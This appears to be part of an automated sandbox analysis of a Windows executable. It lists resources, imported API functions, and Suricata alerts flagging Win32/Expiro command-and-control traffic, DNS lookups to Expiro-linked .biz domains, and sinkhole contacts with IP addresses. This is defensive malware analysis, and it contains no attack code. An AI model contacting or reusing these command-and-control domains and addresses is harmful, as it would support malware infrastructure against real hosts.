                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43d3300x390dataEnglishUnited States0.4692982456140351
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43d6c00x1dcdataEnglishUnited States0.5441176470588235
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43d8a00x346dataEnglishUnited States0.46897374701670647
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43dbe80x334dataEnglishUnited States0.43658536585365854
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43c9580x58dataEnglishUnited States0.8068181818181818
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43df200x23cdataEnglishUnited States0.5122377622377622
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43e8f00x1c2dataEnglishUnited States0.5066666666666667
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43e1600x160dataEnglishUnited States0.5994318181818182
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43e2c00xb2dataEnglishUnited States0.7191011235955056
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43e3780x3d4dataEnglishUnited States0.3408163265306122
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43e7500x19edataEnglishUnited States0.6280193236714976
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43eab80x1a2dataEnglishUnited States0.5741626794258373
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43ec600x34dataEnglishUnited States0.8076923076923077
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43ec980x2a8dataEnglishUnited States0.5338235294117647
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x43ef400x382dataEnglishUnited States0.48552338530066813
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x3305200xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                                                                                                                                                                                                        RT_DIALOG0x3306080x34dataEnglishUnited States0.9038461538461539
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x469e400x1f6Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.44223107569721115
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a0380x3edataEnglishUnited States0.7096774193548387
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a0780x60dataEnglishUnited States0.8125
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a0d80x76dataEnglishUnited States0.8983050847457628
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a1500xb6AmigaOS bitmap font "(W\211[\335\210E\232\325R\013z\017_/", 25451 elements, 2nd, 3rdEnglishUnited States0.8791208791208791
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a2080x110dataEnglishUnited States0.7794117647058824
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a3180x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46441947565543074
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a5300x42dataEnglishUnited States0.6818181818181818
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a5780x116dataEnglishUnited States0.5323741007194245
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a6900x14adataEnglishUnited States0.5545454545454546
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46c2b80x32cdataEnglishUnited States0.4125615763546798
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46c5e80x248dataEnglishUnited States0.5085616438356164
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d2e00x84dataEnglishUnited States0.5833333333333334
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46c8300x2a8dataEnglishUnited States0.36176470588235293
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46cad80x20edataEnglishUnited States0.3155893536121673
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46cce80x24cdataEnglishUnited States0.4370748299319728
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d3680x3cdataEnglishUnited States0.65
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46cf380x16edataEnglishUnited States0.39344262295081966
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d0a80xa6Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.7228915662650602
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d3a80x184dataEnglishUnited States0.4742268041237113
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d5300x66dataEnglishUnited States0.696078431372549
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d7d80x1d6Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0EnglishUnited States0.35319148936170214
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d5980x186dataEnglishUnited States0.5384615384615384
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d7200xb2dataEnglishUnited States0.6179775280898876
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d9b00x48Matlab v4 mat-file (little endian) a, numeric, rows 0, columns 0EnglishUnited States0.7083333333333334
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d1500x18cdataEnglishUnited States0.398989898989899
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a8980x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46aa200x4eedataEnglishUnited States0.375594294770206
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46b2a00x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46afc00x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bce80x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46af100xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bbd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46b5080x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46b9b00x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bcb80x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bd780x53edataEnglishUnited States0.2965722801788376
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4668280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4665880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x465da80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x465ef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4660480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4661980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4662e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4664380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4666d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4669780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x466ac80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x466c180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f2980x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fa880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f3f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f9380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f7e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3301180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f6980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fd280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f5480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fbd80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fe780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32ffc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3302680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3303b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3305080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x2f59000x22dataEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x4670780x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x4674b00x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x4697080x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x469cf80x22dataEnglishUnited States1.1176470588235294
                                                                                                                                                                                                                                                                                                                                                                                        RT_VERSION0x32eda80x2fcdataEnglishUnited States0.4698952879581152
                                                                                                                                                                                                                                                                                                                                                                                        RT_MANIFEST0x46d9f80x4d7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1179), with CRLF line terminatorsEnglishUnited States0.47699757869249393
                                                                                                                                                                                                                                                                                                                                                                                        None0x466c300x1cdataEnglishUnited States1.2857142857142858
                                                                                                                                                                                                                                                                                                                                                                                        None0x466c500x18dataEnglishUnited States1.2916666666666667

                                                                                                                                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                                                                                                                        KERNEL32.dllGetStringTypeW, WriteConsoleW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, EnumSystemLocalesW, IsValidLocale, InitializeSListHead, ExitProcess, GetStdHandle, GetFileType, SetStdHandle, HeapQueryInformation, QueryPerformanceFrequency, VirtualQuery, VirtualAlloc, GetCommandLineA, FreeLibraryAndExitThread, ExitThread, CreateThread, CreateDirectoryW, RtlPcToFileHeader, RtlUnwindEx, OutputDebugStringW, LCMapStringW, GetCPInfo, GetStartupInfoW, GetSystemTimeAsFileTime, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, WaitForSingleObjectEx, ResetEvent, GetUserDefaultLCID, GetTempFileNameW, FindResourceExW, SystemTimeToTzSpecificLocalTime, GetFileTime, GetFileSizeEx, GetFileAttributesExW, FileTimeToLocalFileTime, SetErrorMode, SearchPathW, GetProfileIntW, GetTempPathW, VirtualProtect, GlobalGetAtomNameW, GetThreadLocale, lstrcmpiW, IsDebuggerPresent, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetVolumeInformationW, GetFullPathNameW, FlushFileBuffers, FindFirstFileW, FindClose, DeleteFileW, GlobalFlags, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, GetCurrentDirectoryW, GetFileSize, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, CompareStringW, GlobalFindAtomW, EncodePointer, CopyFileW, MulDiv, GlobalSize, lstrcpyW, GlobalFree, GlobalUnlock, FreeResource, GlobalAddAtomW, GetCurrentProcessId, lstrcmpW, GlobalDeleteAtom, GlobalLock, GlobalAlloc, LoadLibraryExW, GetCurrentThread, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, GetModuleHandleExW, InitializeCriticalSectionAndSpinCount, SetLastError, OutputDebugStringA, ResumeThread, SuspendThread, SetThreadPriority, GetCurrentThreadId, CreateEventW, SetEvent, VerifyVersionInfoW, VerSetConditionMask, LocalFree, FormatMessageW, SearchPathA, GetLocalTime, SetFileAttributesA, GetSystemInfo, lstrcpyA, CreateFileW, lstrlenA, GetModuleFileNameW, WriteFile, SizeofResource, GetFileAttributesW, GetWindowsDirectoryW, GetSystemDirectoryW, CreateProcessW, GetModuleHandleW, FindResourceW, LoadResource, LoadLibraryW, LockResource, GetModuleHandleA, WideCharToMultiByte, GetPrivateProfileStringW, MultiByteToWideChar, GetSystemDefaultLangID, GetPrivateProfileSectionNamesW, GetPrivateProfileIntW, WritePrivateProfileStringW, GetTickCount, Sleep, lstrcmpA, K32EnumProcesses, Process32FirstW, Process32NextW, CreateToolhelp32Snapshot, OpenProcess, GetProcessId, FileTimeToSystemTime, lstrlenW, GetProcessHeap, DeleteCriticalSection, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, LeaveCriticalSection, GetCommandLineW, EnterCriticalSection, HeapFree, FreeLibrary, GetProcAddress, CloseHandle, GetLastError, GetVersionExW, WaitForSingleObject, GetCurrentProcess
                                                                                                                                                                                                                                                                                                                                                                                        USER32.dllMoveWindow, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, SetScrollInfo, GetTopWindow, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, SetWindowLongW, EqualRect, CopyRect, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, SetForegroundWindow, GetForegroundWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, SetFocus, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, IsChild, IsMenu, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, InvalidateRect, UpdateWindow, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutW, GrayStringW, DrawTextExW, DrawTextW, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, CheckDlgButton, CreateAcceleratorTableW, UnregisterClassW, EnableWindow, IsIconic, GetMenuState, GetMenuStringW, MapDialogRect, SetWindowContextHelpId, UnhookWindowsHookEx, PtInRect, ScreenToClient, ClientToScreen, SetActiveWindow, GetNextDlgTabItem, GetDlgItem, EndDialog, CreateDialogIndirectParamW, DestroyWindow, GetLastActivePopup, GetWindowLongW, IsWindowEnabled, SetCursor, ShowOwnedPopups, PostQuitMessage, DrawIconEx, IsRectEmpty, OffsetRect, InflateRect, FillRect, DrawFocusRect, GetSysColorBrush, GetSysColor, MapWindowPoints, RedrawWindow, SetWindowRgn, DrawStateW, GetFocus, DrawFrameControl, DrawEdge, RegisterWindowMessageW, SetWindowTextW, IsDialogMessageW, IntersectRect, SetLayeredWindowAttributes, SetRectEmpty, LoadCursorW, SystemParametersInfoW, EnumDisplayMonitors, SetParent, MonitorFromPoint, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DestroyIcon, CallNextHookEx, SetWindowsHookExW, LoadImageW, CopyImage, TrackMouseEvent, IsZoomed, CharUpperW, GetAsyncKeyState, SetCapture, ReleaseCapture, GetClientRect, LoadIconW, DrawIcon, GetSystemMetrics, SendMessageW, PostMessageW, GetDesktopWindow, MessageBoxA, GetWindowTextA, PeekMessageW, DispatchMessageW, RegisterWindowMessageA, GetClassNameA, GetWindow, GetWindowThreadProcessId, GetParent, GetClassNameW, FindWindowW, EnumWindows, GetDlgCtrlID, IsWindow, ShowWindow, EnumChildWindows, GetWindowRect, SetDlgItemTextW, MessageBoxW, SetWindowPos, wsprintfW, GetMessageW, TranslateMessage, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, GetCursorPos, GetKeyNameTextW, SubtractRect, RegisterClipboardFormatW, CharUpperBuffW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, FrameRect, LoadAcceleratorsW, IsClipboardFormatAvailable, PostThreadMessageW, IsCharLowerW, MapVirtualKeyExW, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, GetComboBoxInfo, CreateMenu, DestroyCursor, GetWindowRgn, HideCaret, InvertRect, MapVirtualKeyW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, GetNextDlgGroupItem, InvalidateRgn, CopyAcceleratorTableW, CharNextW, UpdateLayeredWindow, SendDlgItemMessageA, WaitMessage, RealChildWindowFromPoint, GetUpdateRect, SetClassLongPtrW, DestroyAcceleratorTable, ModifyMenuW, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoW, CopyIcon, GetIconInfo, GetDoubleClickTime, EnableScrollBar, DestroyMenu, SetTimer, KillTimer, LoadMenuW, GetSystemMenu, DeleteMenu, MessageBeep, WindowFromPoint, NotifyWinEvent, SetCursorPos, SetRect, UnionRect, BringWindowToTop, CreatePopupMenu, LockWindowUpdate
                                                                                                                                                                                                                                                                                                                                                                                        GDI32.dllPtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextColor, SetTextAlign, GetObjectW, MoveToEx, TextOutW, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectW, GetMapMode, LineTo, DPtoLP, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesW, GetTextCharsetInfo, RealizePalette, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateRoundRectRgn, Rectangle, GetRgnBox, OffsetRgn, RoundRect, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, EnumFontFamiliesExW, ExtFloodFill, SetPaletteEntries, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, GetViewportOrgEx, LPtoDP, GetWindowOrgEx, SetPixelV, GetTextFaceW, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, DeleteObject, CreatePatternBrush, CreatePen, CreateCompatibleDC, CreateBitmap, BitBlt, GetDeviceCaps, CreateDCW, CopyMetaFileW, GetTextMetricsW, Polyline, Polygon, CreatePolygonRgn, ExtTextOutW, PatBlt, GetTextExtentPoint32W, GetTextColor, GetBkColor, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreateHatchBrush, CreateEllipticRgn, CombineRgn, SetRectRgn, Ellipse, DeleteDC
                                                                                                                                                                                                                                                                                                                                                                                        MSIMG32.dllTransparentBlt, AlphaBlend
                                                                                                                                                                                                                                                                                                                                                                                        WINSPOOL.DRVDocumentPropertiesW, OpenPrinterW, ClosePrinter
                                                                                                                                                                                                                                                                                                                                                                                        ADVAPI32.dllRegQueryInfoKeyW, OpenProcessToken, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW, SetTokenInformation, AllocateAndInitializeSid, GetLengthSid, DuplicateTokenEx, RegCloseKey, RegQueryValueExA, RegSetValueExW, RegQueryInfoKeyA, RegOpenKeyExA, RegQueryValueExW, RegEnumKeyExA, LookupPrivilegeValueW, InitiateSystemShutdownW, AdjustTokenPrivileges
                                                                                                                                                                                                                                                                                                                                                                                        SHELL32.dllShellExecuteExW, SHFileOperationA, SHGetSpecialFolderPathW, DragFinish, DragQueryFileW, ShellExecuteW, SHGetFileInfoW, SHAppBarMessage, SHGetDesktopFolder, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc
                                                                                                                                                                                                                                                                                                                                                                                        COMCTL32.dllInitCommonControlsEx
                                                                                                                                                                                                                                                                                                                                                                                        SHLWAPI.dllPathFindExtensionW, PathFindFileNameW, PathRemoveFileSpecW, PathIsUNCW, StrFormatKBSizeW, PathStripToRootW, PathFileExistsW
                                                                                                                                                                                                                                                                                                                                                                                        UxTheme.dllDrawThemeBackground, GetThemeColor, GetCurrentThemeName, IsAppThemed, CloseThemeData, DrawThemeText, GetWindowTheme, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, OpenThemeData, DrawThemeParentBackground
                                                                                                                                                                                                                                                                                                                                                                                        ole32.dllIsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleUninitialize, CoFreeUnusedLibraries, OleLockRunning, RevokeDragDrop, RegisterDragDrop, OleGetClipboard, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, CreateILockBytesOnHGlobal, CoLockObjectExternal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoDisconnectObject, CreateStreamOnHGlobal, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, CoInitialize, CoCreateInstance, CoCreateGuid, CLSIDFromString, CoInitializeEx, CoUninitialize, CoRevokeClassObject, CoRegisterMessageFilter, OleInitialize
                                                                                                                                                                                                                                                                                                                                                                                        OLEAUT32.dllSysFreeString, SysAllocStringLen, VariantInit, VariantClear, VariantChangeType, SysAllocString, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayDestroy, SysStringLen, LoadTypeLib, OleCreateFontIndirect, VarBstrFromDate, VariantCopy
                                                                                                                                                                                                                                                                                                                                                                                        oledlg.dllOleUIBusyW
                                                                                                                                                                                                                                                                                                                                                                                        gdiplus.dllGdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0
                                                                                                                                                                                                                                                                                                                                                                                        SETUPAPI.dllCM_Reenumerate_DevNode_Ex, CM_Locate_DevNode_ExW, SetupDiEnumDeviceInfo, SetupDiGetDeviceRegistryPropertyW, SetupDiGetClassDevsW, SetupCloseInfFile, SetupFindFirstLineA, SetupFindNextLine, SetupGetMultiSzFieldA, SetupOpenInfFileW, SetupGetStringFieldA, SetupDiDestroyDeviceInfoList
                                                                                                                                                                                                                                                                                                                                                                                        USERENV.dllCreateEnvironmentBlock
                                                                                                                                                                                                                                                                                                                                                                                        newdev.dllUpdateDriverForPlugAndPlayDevicesW
                                                                                                                                                                                                                                                                                                                                                                                        OLEACC.dllCreateStdAccessibleObject, LresultFromObject, AccessibleObjectFromWindow
                                                                                                                                                                                                                                                                                                                                                                                        IMM32.dllImmReleaseContext, ImmGetOpenStatus, ImmGetContext
                                                                                                                                                                                                                                                                                                                                                                                        WINMM.dllPlaySoundW

                                                                                                                                                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:06.202513+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449732TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:06.202513+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449732TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:07.754028+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44973318.141.10.10780TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:07.760195+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.449733TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:07.760195+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.449733TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:10.047679+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.449738TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:10.047679+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.449738TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:10.083474+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4532481.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:11.575918+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4582961.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:35.211531+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.449752TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:35.211531+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.449752TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:36.856537+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.449753TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:36.856537+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.449753TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:42.766102+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.449759TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:42.766102+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.449759TCP
